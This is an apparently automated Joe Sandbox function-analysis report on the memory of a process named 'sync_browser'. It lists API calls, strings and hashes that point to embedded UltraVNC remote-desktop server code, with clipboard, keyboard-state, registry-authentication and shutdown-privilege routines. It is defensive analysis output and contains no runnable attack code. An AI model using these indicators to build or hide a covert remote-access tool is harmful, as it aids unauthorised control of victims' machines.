_get_daylight.LIBCMT ref: 00007FF67E88072C
_isindst.LIBCMT ref: 00007FF67E880770
_isindst.LIBCMT ref: 00007FF67E8807C0
__getgmtimebuf.LIBCMT ref: 00007FF67E8809BA

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
String ID:
API String ID: 1457502553-0
Opcode ID: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
Instruction ID: e77412ffff92e026ae6deaba0f9a87f576e61e80e9892330ca95c337226eb174
Opcode Fuzzy Hash: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
Instruction Fuzzy Hash: 4591C673B347464BFB689F25C9517A9A2D5EB64788F048035FE0DCAB9AEE3CE5048700

Function 00007FF67E7C6060 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 354libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF67E7C60A0
GetVersion.KERNEL32 ref: 00007FF67E7C64EF
GetProcAddress.KERNEL32 ref: 00007FF67E7C656B
GetSystemInfo.KERNEL32 ref: 00007FF67E7C6582
GetSystemInfo.KERNEL32 ref: 00007FF67E7C6594

Strings

GetVersionExA, xrefs: 00007FF67E7C6093
GetNativeSystemInfo, xrefs: 00007FF67E7C6561
@, xrefs: 00007FF67E7C63F2

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressInfoProcSystem$Version
String ID: @$GetNativeSystemInfo$GetVersionExA
API String ID: 4103462327-1183986914
Opcode ID: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
Instruction ID: 70249d40aacc4f818e30fa9811248f2ce9dc1dc4da3aafa9e4951566403c973e
Opcode Fuzzy Hash: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
Instruction Fuzzy Hash: CBF16E73A286818AE750CF75D0803BD77A9FB65B48F188135EA4D8A2A9DF3CD549CB10

Function 00007FF67E7E6BBD Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E7BAC

Part of subcall function 00007FF67E7EC660: GetTickCount.KERNEL32 ref: 00007FF67E7EC69F

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseCountCriticalInputLeaveOpenSectionTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 429868813-3977938048
Opcode ID: e9e62cd296078c53cb1cec29766dcffb447fb13737ad5941dcee0614298be037
Instruction ID: 985dbab6d54e08ef085167f0a78845f392dc25cd87af7ea2ec91ea61baba09f6
Opcode Fuzzy Hash: e9e62cd296078c53cb1cec29766dcffb447fb13737ad5941dcee0614298be037
Instruction Fuzzy Hash: 5CC1E333A28A9181F750CB25C4597FE2BA5EBA5B84F194135EA4CCB7A5DF3CD849C700

Function 00007FF67E7DB3D0 Relevance: 14.0, APIs: 9, Instructions: 489COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00007FF67E7DB792
CreateRectRgn.GDI32 ref: 00007FF67E7DB7C4
CombineRgn.GDI32 ref: 00007FF67E7DB7E4
DeleteObject.GDI32 ref: 00007FF67E7DB7ED
free.LIBCMT ref: 00007FF67E7DB7F6
CreateRectRgn.GDI32 ref: 00007FF67E7DBA18
CombineRgn.GDI32 ref: 00007FF67E7DBA38
DeleteObject.GDI32 ref: 00007FF67E7DBA41
free.LIBCMT ref: 00007FF67E7DBA4A

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateRect$CombineDeleteObjectfree$malloc
String ID:
API String ID: 4067307076-0
Opcode ID: b61e87ee609763207e942b65584275b9d477987c28981c2977f50c6ab867ee76
Instruction ID: 2b985c961d16962a2812627f4ff09f3296a8ee6fba5c8e61d8b1abc74ed2aa30
Opcode Fuzzy Hash: b61e87ee609763207e942b65584275b9d477987c28981c2977f50c6ab867ee76
Instruction Fuzzy Hash: 7C226D77A186818BD724CF25E54066ABBA1F798B84F148135FA8E87B58DF3CE945CF00

Function 00007FF67E7D74C0 Relevance: 13.6, APIs: 9, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 00007FF67E7D7509
GetKeyState.USER32 ref: 00007FF67E7D7523
GetKeyState.USER32 ref: 00007FF67E7D753D
GetKeyState.USER32 ref: 00007FF67E7D7557
GetKeyState.USER32 ref: 00007FF67E7D7571
GetKeyState.USER32 ref: 00007FF67E7D758B
TryEnterCriticalSection.KERNEL32 ref: 00007FF67E7D75D6
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7D760F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: State$CriticalSection$EnterLeave
String ID:
API String ID: 1138030011-0
Opcode ID: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
Instruction ID: ddafe9ce3ffb2b55b3b7d3f094eea21171439c2ea0692c6a853ad026466e2af7
Opcode Fuzzy Hash: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
Instruction Fuzzy Hash: 6E41D82BA3865282F6129B25E50433A96A5FFA0356F110434FD9E875A0CF3DAC4DD320

Function 00007FF67E7E51B7 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 399COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2

Part of subcall function 00007FF67E7C1AE0: OpenClipboard.USER32 ref: 00007FF67E7C1B0B

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DesktopOpen$ClipboardCloseInput
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2872304593-3977938048
Opcode ID: 79ffba6a5e268d0255684b3df970d976629e0ac15b6f1d1aa7ce9095906a10a8
Instruction ID: e75825b52a3be133804defd0aad9d24d9f81357406dfd1cfea4cf9d3d0ffb6fe
Opcode Fuzzy Hash: 79ffba6a5e268d0255684b3df970d976629e0ac15b6f1d1aa7ce9095906a10a8
Instruction Fuzzy Hash: 9412C133A28AC185EB60CB25C8587FD67A5EBA5B84F544135EA4D8BBE5DF3CD449C300

Function 00007FF67E8178E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E81792E
RegQueryValueExA.ADVAPI32 ref: 00007FF67E81796A
RegQueryValueExA.ADVAPI32 ref: 00007FF67E8179B2
GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E817A02

Strings

UseRegistry, xrefs: 00007FF67E81791D
admin, xrefs: 00007FF67E817924
admin_auth, xrefs: 00007FF67E8179E0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfileQueryValue$FileModuleNameString
String ID: UseRegistry$admin$admin_auth
API String ID: 3374479654-3376419731
Opcode ID: c974abdd07833f38f99300646e9335ba4a5e549fe6b91c786acd5bf0f72e0e3f
Instruction ID: 655e791b82501873d0ad92c049bf57bbcc49e69b9cd9d875bd7c7fd742e49828
Opcode Fuzzy Hash: c974abdd07833f38f99300646e9335ba4a5e549fe6b91c786acd5bf0f72e0e3f
Instruction Fuzzy Hash: CA313233638A4281EA608B51E8447AAF3A4FBA9784F441139FA8D87B94DF3DD549CB00

Function 00007FF67E7E1620 Relevance: 12.3, APIs: 5, Strings: 3, Instructions: 323COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF67E7E168C

Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8

EnterCriticalSection.KERNEL32 ref: 00007FF67E7E1813
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E183B

Part of subcall function 00007FF67E7E2CC0: malloc.LIBCMT ref: 00007FF67E7E2D28
Part of subcall function 00007FF67E7E2CC0: GetCurrentProcessId.KERNEL32 ref: 00007FF67E7E2D6C
Part of subcall function 00007FF67E7E2CC0: rand.LIBCMT ref: 00007FF67E7E2D90

free.LIBCMT ref: 00007FF67E7E1A63
free.LIBCMT ref: 00007FF67E7E1AB0

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF67E7E166F
unable to determine legacy authentication method, xrefs: 00007FF67E7E173F
i, xrefs: 00007FF67E7E1809

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
API String ID: 2847437661-1576074771
Opcode ID: 9c70349ac644cdd4acf1d1aca859d57c3c31dfe63f276392e806348dce432cd7
Instruction ID: 09e0f9b759061ea5cb696b4c82ae6b53eb44bbca58b6da16ed09aaca0cbd0d04
Opcode Fuzzy Hash: 9c70349ac644cdd4acf1d1aca859d57c3c31dfe63f276392e806348dce432cd7
Instruction Fuzzy Hash: 5FD19D23B28A8285FB14CB65D8553FC27A2EB94764F144275EE2E9BAD5CF3CD849C340

Function 00007FF67E817650 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722

Strings

UseRegistry, xrefs: 00007FF67E817678
Software\UltraVNC, xrefs: 00007FF67E8176B3
mslogon, xrefs: 00007FF67E8176F3
admin, xrefs: 00007FF67E81767F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Create$FileModuleNamePrivateProfile
String ID: Software\UltraVNC$UseRegistry$admin$mslogon
API String ID: 27673491-2056936749
Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
Instruction ID: a20185027f88071c04369e85314a74809eb3fd9f9da9de85b4bb27f95dda87f0
Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
Instruction Fuzzy Hash: 26213133A28B4292E7608F14F4907AAB3A4FB95354F801136F69D86A59DF7DD149CB00

Function 00007FF67E7D3550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF67E7D3569
OpenProcessToken.ADVAPI32 ref: 00007FF67E7D357C
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF67E7D3594
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF67E7D35C5
GetVersionExA.KERNEL32 ref: 00007FF67E7D35DC
ExitWindowsEx.USER32 ref: 00007FF67E7D35F1

Strings

SeShutdownPrivilege, xrefs: 00007FF67E7D358B

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
String ID: SeShutdownPrivilege
API String ID: 337752880-3733053543
Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
Instruction ID: 20818e8409b72a00edeac4be7020cec09c3d6ba53f943700c7eb58ef0799bab5
Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
Instruction Fuzzy Hash: 84116072A28A4296E760DB64F8593AAB3A4FB94744F800035F58E86A94DF7CD04DCB00

Function 00007FF67E7F1660 Relevance: 12.3, APIs: 8, Instructions: 292windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF67E7F169D
IsWindowVisible.USER32 ref: 00007FF67E7F16B9
GetWindowRect.USER32 ref: 00007FF67E7F16CA
IsWindowVisible.USER32 ref: 00007FF67E7F172F
GetWindowRect.USER32 ref: 00007FF67E7F1744

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$RectVisible$Foreground
String ID:
API String ID: 2499709836-0
Opcode ID: fd4ffa4dc86c0a1f228acc40c3b9d3b4e4fe0aed8a44007872f92d5eb7780ab3
Instruction ID: 7a7c01dd6a3dbe0c504518a020bc17a34045ea8d55df61f339868ecc168ab8d1
Opcode Fuzzy Hash: fd4ffa4dc86c0a1f228acc40c3b9d3b4e4fe0aed8a44007872f92d5eb7780ab3
Instruction Fuzzy Hash: E5D14E73B246918EE714CFB9D4406AC37B6FB58748F105139EE0DA7B49DE38945ACB40

Function 00007FF67E7C5910 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7C5944
FindFirstFileA.KERNEL32 ref: 00007FF67E7C59E2

Strings

*.dsm, xrefs: 00007FF67E7C59C1

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
